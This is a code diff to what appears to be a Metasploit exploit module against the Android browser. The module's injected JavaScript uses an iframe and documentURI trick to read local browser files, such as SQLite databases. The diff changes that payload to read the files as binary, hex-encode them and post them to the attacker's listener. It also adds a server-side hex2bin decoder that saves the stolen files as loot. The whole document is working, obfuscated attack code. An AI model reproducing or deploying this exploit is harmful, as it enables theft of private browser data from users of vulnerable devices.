@@ -64,13 +64,14 @@ def on_request_uri(cli, request)
64
64
65
65
def process_post ( cli , request )
66
66
data = JSON . parse ( request . body )
67
+ contents = hex2bin ( data [ 'data' ] )
67
68
file = File . basename ( data [ 'url' ] )
68
- print_good "File received: #{ request . body . length . to_f /1024 } kb #{ file } "
69
+ print_good "File received: #{ ( contents . bytesize . to_f /1000 ) . round ( 2 ) } kb #{ file } "
69
70
loot_path = store_loot (
70
71
file ,
71
72
'application/x-sqlite3' ,
72
73
cli . peerhost ,
73
- data ,
74
+ contents ,
74
75
File . basename ( data [ 'url' ] ) ,
75
76
"#{ cli . peerhost . ljust ( 16 ) } Android browser file"
76
77
)
@@ -125,8 +126,11 @@ def exploit_js
125
126
'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+
126
127
'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
127
128
'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+
128
- 'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+
129
- 'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+
129
+ 'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.responseType=String.fromCharCode(97,'+
130
+ '114,114,97,121,98,117,102,102,101,114);x.send();x.onload=function(){window.onerror=alert;'+
131
+ 'var buff = new Uint8Array(x.response);var hex = Array.prototype.map.call(buff, function(d)'+
132
+ '{var c = d.toString(16);return (c.length < 2) ? 0+c : c;}).join(new String); top.postMessa'+
133
+ 'ge({data:hex,url:location.href}, String.fromCharCode(42));'+
130
134
'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+
131
135
'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();';
132
136
brokenFrame.contentWindow.location = "";
@@ -136,4 +140,9 @@ def exploit_js
136
140
|
137
141
end
138
142
143
+ # TODO: Make this a proper Rex::Text function
144
+ def hex2bin ( hex )
145
+ hex . chars . each_slice ( 2 ) . map ( &:join ) . map { |c | c . to_i ( 16 ) } . map ( &:chr ) . join
146
+ end
147
+
139
148
end
0 commit comments